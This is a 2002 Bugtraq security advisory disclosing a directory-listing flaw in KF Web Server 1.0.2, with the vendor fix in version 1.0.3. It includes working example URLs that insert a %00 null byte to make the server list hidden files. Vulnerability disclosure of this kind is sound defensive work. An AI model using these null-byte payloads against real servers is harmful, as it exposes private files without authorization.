[26086] in bugtraq
KF Web Server version 1.0.2 shows file and directory content
daemon@ATHENA.MIT.EDU (Securiteinfo.com)
Mon Jul 8 15:55:51 2002
Content-Type: text/plain;
charset="iso-8859-1"
From: "Securiteinfo.com" <webmaster@securiteinfo.com>
To: nobody@securiteinfo.com
Date: Sun, 7 Jul 2002 21:42:47 +0200
MIME-Version: 1.0
Message-Id: <02070721424701.01082@scrap>
Content-Transfer-Encoding: 8bit
KF Web Server version 1.0.2 shows file and directory content
.oO Overview Oo.
KF Web Server version 1.0.2 shows file and directory content
Discovered on 2002, July, 2nd
Vendor: KeyFocus (http://www.keyfocus.net/kfws/)
KF Web Server 1.0.2 is a free personal web server available for Windows
98,ME,2000,XP. This web server can shows file and directory content.
.oO Details Oo.
If the requested URL contains a %00 after a directory name, then the server
shows all files in the directory content.
A hacker can see all hidden (non-HTML linked) files and directories on the
server.
.oO Exploit Oo.
The exploit is really easy. You can do it with any browser
Examples :
http://server_name/index.html : Normal use.
http://server_name/%00 : You get the vulnerability.
http://server_name/index.html%00 : Is *not* vulnerable.
http://server_name/%00index.html : You get the vulnerability. In fact
everything after %00 is ignored.
http://server_name/subdir/%00 : You get the vulnerability.
.oO Solution Oo.
The vendor has been informed and has solved the problem.
Upgrade to KF Web Server version 1.0.3
(http://www.keyfocus.net/kfws/download/)
.oO Discovered by Oo.
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com
